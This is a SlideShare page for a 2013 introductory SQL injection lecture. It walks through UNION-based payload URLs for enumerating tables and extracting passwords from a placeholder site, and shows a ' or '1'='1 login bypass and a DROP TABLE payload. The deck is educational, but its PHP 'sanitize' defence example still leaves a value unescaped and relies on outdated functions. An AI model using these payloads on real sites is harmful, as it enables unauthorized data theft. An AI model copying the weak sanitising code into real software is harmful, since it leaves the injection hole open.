KEMBAR78
A Brief Introduction in SQL Injection | PPT
Sina Manavi, profile picture
Uploaded bySina Manavi
PPT, PDF6,233 views

A Brief Introduction in SQL Injection

This document discusses SQL injection, including what it is, how it works, and how to perform SQL injection attacks to extract information from a database and alter data. It provides examples of SQL queries that can be used to find the number of columns in a table, determine table and column names, and extract or alter data. The document notes that proper input validation and use of prepared statements are needed to prevent SQL injection attacks, and that no single solution can fully prevent SQL injection.

Education
Related topics:
Web Security Overview
In this document
Powered by AI

Overview of SQL Injection, its significance, and prevention methods.

Introduction to SQL, its role in web dynamics, and the concept of SQL Injection.

Explains how SQL Injection can occur through user interface forms and URLs.

Using INFORMATION_SCHEMA to find table/column names via SQL Injection.

Processes to extract and manipulate user data from databases through SQL Injection.

Impacts of extensive queries on performance and potential malicious commands.

Illustrates how unauthorized access can be achieved through coding and the importance of developer responsibility.

Effective techniques to prevent SQL Injection, emphasizing proper error handling and secure coding practices. Insights on database security, emphasizing the limits of firewalls and exploring NoSQL database immunity.

Downloaded 61 times
Security Lab, University Putra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.html
• Introduction • Why SQL Injection • What is needed for this • What you can do with SQL Injection • What are its pros and cons • Why we need to know and how we can prevent our database from SQL injection attacks
We are all familiar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access
 SQL Injection may happen only two form of UI based or URL based ◦ (1) Injecting into a form. Such as username and password boxes on a login page. ◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php? pid=10
 Simple example:  Select ID from tbl_users ◦ Where ID=“Uid” and pass=“pass” ◦ If it returns any value means that the current inputs are correct
 www.yourtarget.com/list?id=5  if you want to view a record from a table by the URL based injection: Select * from tbl_users Where id=5
 The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change. ◦ Tables holding all the tables name:  "INFORMATION_SCHEMA.TABLES.“ ◦ Tables holding all the Column name:  "INFORMATION_SCHEMA.COLUMNS.“
 Finding the URL quantity: ◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1-- Increase the 1 , until you got error, then the last number is the column number  Finding Table name ◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- And it shows: tbl_user To Be continued 
 Now its time to find out the Column names: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name=‘tbl_user'--  The result would be as following : id,username,password Column names finding step: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'— Try the columns name until you find your target (e.g username,password, or login)
 And Finally its time to see the records: ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,username,3+FROM+UserAccounts—  And ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts— ◦ Username=admin password=123456 ◦ Stupid admin ha ;) 
 Now we can Alter the records as well, lets rock UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command
If user_list contains 1000 records then, the database is fired up  SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
Insert newuser into tbl_user The maliciouse code can be : DROP table tbl_user
 How it works Select * from tbl_users Where id=“Fname” and pass=“pass”  Malicious Code: SELECT * FROM table WHERE id= ‘Fname' or '1'='1'; if(mysql_num_rows($result)) //do login Now the unauthorized user get accessed easily and bypassed the authorization
 Security is the developer’s job  No database, connector, or framework can prevent SQL injection all the time
• Implement proper Error Handling. This would include using a single error message for all errors. • Lock down User Database configuration, Specify users, roles and permissions etc. • prefix and append a quote to all user input, even if the data is numeric .
<?php function sanitize($string){ $string = strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
Vipin Samar, Oracle vice president of Database Security: “Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
 Using Stroprocedures: CREATE PROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END CALL SP_show_user (54) “Might be helpful but still vulnerable”
 I don’t have to worry anymore  Escaping is the fixthe fix  More escaping is better  I can code an escaping function  Only user input is unsafe  Stored procs are the fixthe fix  SQL privileges are the fixthe fix  My app doesn’t need security  Frameworks are the fixthe fix  Parameters quote for you  Parameters are the fixthe fix  Parameters make queries slow  SQL proxies are the fixthe fix  NoSQL databases are the fixthe fix
NoSQL databases are immune to SQL injection.

More Related Content

PPTX
SQL INJECTION
byMentorcs
 
PPTX
Ppt on sql injection
byashish20012
 
PDF
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
PPTX
Sql injection
byZidh
 
PPTX
SQL Injections (Part 1)
byn|u - The Open Security Community
 
PPTX
Sql injection
byHemendra Kumar
 
PPTX
SQL Injections - A Powerpoint Presentation
byRapid Purple
 
PDF
How to identify and prevent SQL injection
byEguardian Global Services
 
SQL INJECTION
byMentorcs
 
Ppt on sql injection
byashish20012
 
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
Sql injection
byZidh
 
SQL Injections (Part 1)
byn|u - The Open Security Community
 
Sql injection
byHemendra Kumar
 
SQL Injections - A Powerpoint Presentation
byRapid Purple
 
How to identify and prevent SQL injection
byEguardian Global Services
 

What's hot

PPTX
Sql Injection attacks and prevention
byhelloanand
 
PPTX
Sql injections - with example
byPrateek Chauhan
 
PPT
Sql injection attack
byRajKumar Rampelli
 
PPT
Sql injection
byNikunj Dhameliya
 
PPT
SQL Injection
byAdhoura Academy
 
PPTX
seminar report on Sql injection
byJawhar Ali
 
PPTX
SQL injection prevention techniques
bySongchaiDuangpan
 
PPTX
Sql injection
bySasha-Leigh Garret
 
PPTX
Sql injection - security testing
byNapendra Singh
 
PPT
Sql injection
byNitish Kumar
 
PPTX
Sql injection in cybersecurity
bySanad Bhowmik
 
PPTX
SQL Injection
byAsish Kumar Rath
 
PPTX
SQL injection
byRaj Parmar
 
PPTX
Sql injection
byManjushree Mashal
 
PPTX
SQL INJECTION
byAnoop T
 
PPTX
Cross-Site Scripting (XSS)
byDaniel Tumser
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
PDF
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
byEdureka!
 
PPT
Sql injection
byPallavi Biswas
 
PPTX
Command injection
bypenetration Tester
 
Sql Injection attacks and prevention
byhelloanand
 
Sql injections - with example
byPrateek Chauhan
 
Sql injection attack
byRajKumar Rampelli
 
Sql injection
byNikunj Dhameliya
 
SQL Injection
byAdhoura Academy
 
seminar report on Sql injection
byJawhar Ali
 
SQL injection prevention techniques
bySongchaiDuangpan
 
Sql injection
bySasha-Leigh Garret
 
Sql injection - security testing
byNapendra Singh
 
Sql injection
byNitish Kumar
 
Sql injection in cybersecurity
bySanad Bhowmik
 
SQL Injection
byAsish Kumar Rath
 
SQL injection
byRaj Parmar
 
Sql injection
byManjushree Mashal
 
SQL INJECTION
byAnoop T
 
Cross-Site Scripting (XSS)
byDaniel Tumser
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
byEdureka!
 
Sql injection
byPallavi Biswas
 
Command injection
bypenetration Tester
 

Viewers also liked

PDF
Cehv8 Labs - Module14: SQL Injection
byVuz Dở Hơi
 
PPTX
Sql Injection and Entity Frameworks
byRich Helton
 
PPTX
Unethical access to website’s databases hacking using sql injection
bySatyajit Mukherjee
 
PPTX
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
byEC-Council
 
PDF
HTTPS, Here and Now
byPhilippe De Ryck
 
PDF
Java Course 13: JDBC & Logging
byAnton Keks
 
PDF
Hacking With Sql Injection Exposed - A Research Thesis
bycorbanmiferreira
 
PPTX
SQL Injection
byMarios Siganos
 
DOCX
Types of sql injection attacks
byRespa Peter
 
PDF
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
byGuy Podjarny
 
PPT
Jdbc ppt
byVikas Jagtap
 
PPT
Mime
bypullel
 
PPTX
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
byAnna Morrison
 
DOC
Bài tập kế toán tài chính doanh nghiệp có đáp án
byTrung tâm đào tạo kế toán hà nội
 
DOC
9 dạng bài tập định khoản kế toán
byLớp kế toán trưởng
 
PPTX
Introduction to SEO Presentation
by7thingsmedia
 
PPTX
ethical hacking in the modern times
byjeshin jose
 
PPTX
Jdbc Ppt
byCentre for Budget and Governance Accountability (CBGA)
 
Cehv8 Labs - Module14: SQL Injection
byVuz Dở Hơi
 
Sql Injection and Entity Frameworks
byRich Helton
 
Unethical access to website’s databases hacking using sql injection
bySatyajit Mukherjee
 
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
byEC-Council
 
HTTPS, Here and Now
byPhilippe De Ryck
 
Java Course 13: JDBC & Logging
byAnton Keks
 
Hacking With Sql Injection Exposed - A Research Thesis
bycorbanmiferreira
 
SQL Injection
byMarios Siganos
 
Types of sql injection attacks
byRespa Peter
 
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
byGuy Podjarny
 
Jdbc ppt
byVikas Jagtap
 
Mime
bypullel
 
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
byAnna Morrison
 
Bài tập kế toán tài chính doanh nghiệp có đáp án
byTrung tâm đào tạo kế toán hà nội
 
9 dạng bài tập định khoản kế toán
byLớp kế toán trưởng
 
Introduction to SEO Presentation
by7thingsmedia
 
ethical hacking in the modern times
byjeshin jose
 
Jdbc Ppt
byCentre for Budget and Governance Accountability (CBGA)
 

Similar to A Brief Introduction in SQL Injection

PDF
Sq linjection
byMahesh Gupta (DBATAG) - SQL Server Consultant
 
PPT
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
PPT
Sql Injection Adv Owasp
byAung Khant
 
PPT
Advanced SQL Injection
byamiable_indian
 
PPSX
Web application security
bywww.netgains.org
 
PPTX
Sql injection
byMehul Boghra
 
PDF
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
PPT
SQLSecurity.ppt
byLokeshK66
 
PPT
SQLSecurity.ppt
byCNSHacking
 
PPTX
Sql injection
byNuruzzaman Milon
 
PPT
Sql injections
byManish Kushwaha
 
PDF
SQL Injection Attack Guide for ethical hacking
byAyan Live Rourkela
 
PPT
Sql injection attacks
bychaitanya Lotankar
 
PPT
Sql security
bySafwan Hashmi
 
PPTX
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
PDF
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
PDF
Sql injection
bySafwan Hashmi
 
PPT
SQL Injection Attacks
byCompare Infobase Limited
 
PDF
Chapter 14 sql injection
bynewbie2019
 
PPT
Sql Injection
bySanjeev Kumar Jaiswal
 
Sq linjection
byMahesh Gupta (DBATAG) - SQL Server Consultant
 
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
Sql Injection Adv Owasp
byAung Khant
 
Advanced SQL Injection
byamiable_indian
 
Web application security
bywww.netgains.org
 
Sql injection
byMehul Boghra
 
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
SQLSecurity.ppt
byLokeshK66
 
SQLSecurity.ppt
byCNSHacking
 
Sql injection
byNuruzzaman Milon
 
Sql injections
byManish Kushwaha
 
SQL Injection Attack Guide for ethical hacking
byAyan Live Rourkela
 
Sql injection attacks
bychaitanya Lotankar
 
Sql security
bySafwan Hashmi
 
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
bySam Bowne
 
Sql injection
bySafwan Hashmi
 
SQL Injection Attacks
byCompare Infobase Limited
 
Chapter 14 sql injection
bynewbie2019
 
Sql Injection
bySanjeev Kumar Jaiswal
 

More from Sina Manavi

PPTX
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
bySina Manavi
 
PPTX
EC-Council Hackway Workshop Presentation- Social Media Forensics
bySina Manavi
 
PPTX
Password Attack
bySina Manavi
 
PPTX
Android Hacking + Pentesting
bySina Manavi
 
PPTX
Password Cracking
bySina Manavi
 
PPTX
An Introduction on Design and Implementation on BYOD and Mobile Security
bySina Manavi
 
PPTX
Aes (advance encryption standard)
bySina Manavi
 
PPTX
Shannon and 5 good criteria of a good cipher
bySina Manavi
 
PPT
Honeypot honeynet
bySina Manavi
 
PPTX
Mendeley resentation , Sina Manavi
bySina Manavi
 
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
bySina Manavi
 
EC-Council Hackway Workshop Presentation- Social Media Forensics
bySina Manavi
 
Password Attack
bySina Manavi
 
Android Hacking + Pentesting
bySina Manavi
 
Password Cracking
bySina Manavi
 
An Introduction on Design and Implementation on BYOD and Mobile Security
bySina Manavi
 
Aes (advance encryption standard)
bySina Manavi
 
Shannon and 5 good criteria of a good cipher
bySina Manavi
 
Honeypot honeynet
bySina Manavi
 
Mendeley resentation , Sina Manavi
bySina Manavi
 

Recently uploaded

PPTX
THERAPEUTIC ENVIORNMENT.............pptx
byAneetaSharma15
 
PPTX
DBP - BITA Introduction Slides Oct 202526
byGreat Files
 
PPTX
Nerve lecture 2:strength-duration curve and an introduction to action potential
bydina merzeban
 
PDF
Phase Equilibria and Colligative Properties.pdf
byMithil Fal Desai
 
PPTX
DPSM-BITDA Introduction Presentation Slides
byGreat Files
 
PPTX
Hudson Vitale "AI Essentials: From Tools to Strategies: A 2025 NISO Training ...
byNational Information Standards Organization (NISO)
 
PPTX
Capital Budgeting - Risk Analysis Using Payback Period Method
bySundar B N
 
DOCX
Extension Education: From theory to practice by Dr Subin K Mohan.docx
byDrSubinKMohan
 
PPTX
How can education build trust in a polarised world_Jonathan James_OECD .pptx
byEduSkills OECD
 
PDF
Umlando kaMufi. IsiZulu Ulimi Lwebele...
byNokwandaNzuza2
 
PPTX
GAS chromatography ppt (Presentation) by Jatin Chauhan
byjatinchauhan1618
 
PPTX
Agriculture Lesson Note for Grade 11 Chapter 3 & 4.pptx
byNajibMuhidin
 
PPTX
Safety Needs and Prevention of environmental hazards.pptx
byAneetaSharma15
 
PDF
Unofficial Draft by Simanchala Sarab: #GNDU #B.A. B.Ed. (#ITEP) #Pre-Interns...
bySimanchala Sarab, BABed(ITEP Secondary stage) in History student at GNDU Amritsar
 
PPTX
How to Create a Manifest File in Odoo 18
byCeline George
 
PPTX
Capital Budgeting - Risk Analysis Using Sensitivity Analysis
bySundar B N
 
PDF
BUSINESS ETHICS – UNIT V: Ethical Insights from Thirukkural and Modern Thought
byD NANEE
 
PDF
The Children’s Support Fund, set up to support the welfare and education of c...
bynservice241
 
PPTX
🧪“Blood Chemistry Tests in Pharmacy Practice: Clinical Laboratory Guide for P...
byBanny S.V
 
PDF
History of Department of AIHC and Archaeology_BHU
byBanaras Hindu University
 
THERAPEUTIC ENVIORNMENT.............pptx
byAneetaSharma15
 
DBP - BITA Introduction Slides Oct 202526
byGreat Files
 
Nerve lecture 2:strength-duration curve and an introduction to action potential
bydina merzeban
 
Phase Equilibria and Colligative Properties.pdf
byMithil Fal Desai
 
DPSM-BITDA Introduction Presentation Slides
byGreat Files
 
Hudson Vitale "AI Essentials: From Tools to Strategies: A 2025 NISO Training ...
byNational Information Standards Organization (NISO)
 
Capital Budgeting - Risk Analysis Using Payback Period Method
bySundar B N
 
Extension Education: From theory to practice by Dr Subin K Mohan.docx
byDrSubinKMohan
 
How can education build trust in a polarised world_Jonathan James_OECD .pptx
byEduSkills OECD
 
Umlando kaMufi. IsiZulu Ulimi Lwebele...
byNokwandaNzuza2
 
GAS chromatography ppt (Presentation) by Jatin Chauhan
byjatinchauhan1618
 
Agriculture Lesson Note for Grade 11 Chapter 3 & 4.pptx
byNajibMuhidin
 
Safety Needs and Prevention of environmental hazards.pptx
byAneetaSharma15
 
Unofficial Draft by Simanchala Sarab: #GNDU #B.A. B.Ed. (#ITEP) #Pre-Interns...
bySimanchala Sarab, BABed(ITEP Secondary stage) in History student at GNDU Amritsar
 
How to Create a Manifest File in Odoo 18
byCeline George
 
Capital Budgeting - Risk Analysis Using Sensitivity Analysis
bySundar B N
 
BUSINESS ETHICS – UNIT V: Ethical Insights from Thirukkural and Modern Thought
byD NANEE
 
The Children’s Support Fund, set up to support the welfare and education of c...
bynservice241
 
🧪“Blood Chemistry Tests in Pharmacy Practice: Clinical Laboratory Guide for P...
byBanny S.V
 
History of Department of AIHC and Archaeology_BHU
byBanaras Hindu University
 

A Brief Introduction in SQL Injection

  • 1.
    Security Lab, UniversityPutra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.html
  • 2.
    • Introduction • WhySQL Injection • What is needed for this • What you can do with SQL Injection • What are its pros and cons • Why we need to know and how we can prevent our database from SQL injection attacks
  • 3.
    We are allfamiliar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access
  • 5.
     SQL Injectionmay happen only two form of UI based or URL based ◦ (1) Injecting into a form. Such as username and password boxes on a login page. ◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php? pid=10
  • 6.
     Simple example: Select ID from tbl_users ◦ Where ID=“Uid” and pass=“pass” ◦ If it returns any value means that the current inputs are correct
  • 7.
     www.yourtarget.com/list?id=5  ifyou want to view a record from a table by the URL based injection: Select * from tbl_users Where id=5
  • 8.
     The "INFORMATION_SCHEMA"holds the names of every table and column on a site, its name will never change. ◦ Tables holding all the tables name:  "INFORMATION_SCHEMA.TABLES.“ ◦ Tables holding all the Column name:  "INFORMATION_SCHEMA.COLUMNS.“
  • 9.
     Finding theURL quantity: ◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1-- Increase the 1 , until you got error, then the last number is the column number  Finding Table name ◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- And it shows: tbl_user To Be continued 
  • 10.
     Now itstime to find out the Column names: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name=‘tbl_user'--  The result would be as following : id,username,password Column names finding step: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'— Try the columns name until you find your target (e.g username,password, or login)
  • 11.
     And Finallyits time to see the records: ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,username,3+FROM+UserAccounts—  And ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts— ◦ Username=admin password=123456 ◦ Stupid admin ha ;) 
  • 12.
     Now wecan Alter the records as well, lets rock UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command
  • 13.
    If user_list contains1000 records then, the database is fired up  SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
  • 14.
    Insert newuser intotbl_user The maliciouse code can be : DROP table tbl_user
  • 15.
     How itworks Select * from tbl_users Where id=“Fname” and pass=“pass”  Malicious Code: SELECT * FROM table WHERE id= ‘Fname' or '1'='1'; if(mysql_num_rows($result)) //do login Now the unauthorized user get accessed easily and bypassed the authorization
  • 16.
     Security isthe developer’s job  No database, connector, or framework can prevent SQL injection all the time
  • 17.
    • Implement properError Handling. This would include using a single error message for all errors. • Lock down User Database configuration, Specify users, roles and permissions etc. • prefix and append a quote to all user input, even if the data is numeric .
  • 18.
    <?php function sanitize($string){ $string =strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
  • 19.
    Vipin Samar, Oraclevice president of Database Security: “Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
  • 20.
     Using Stroprocedures: CREATEPROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END CALL SP_show_user (54) “Might be helpful but still vulnerable”
  • 21.
     I don’thave to worry anymore  Escaping is the fixthe fix  More escaping is better  I can code an escaping function  Only user input is unsafe  Stored procs are the fixthe fix  SQL privileges are the fixthe fix  My app doesn’t need security  Frameworks are the fixthe fix  Parameters quote for you  Parameters are the fixthe fix  Parameters make queries slow  SQL proxies are the fixthe fix  NoSQL databases are the fixthe fix
  • 22.
    NoSQL databases areimmune to SQL injection.

Editor's Notes

  • #5 Tables have relation with each other . Inserting the row in tables with unauthorized access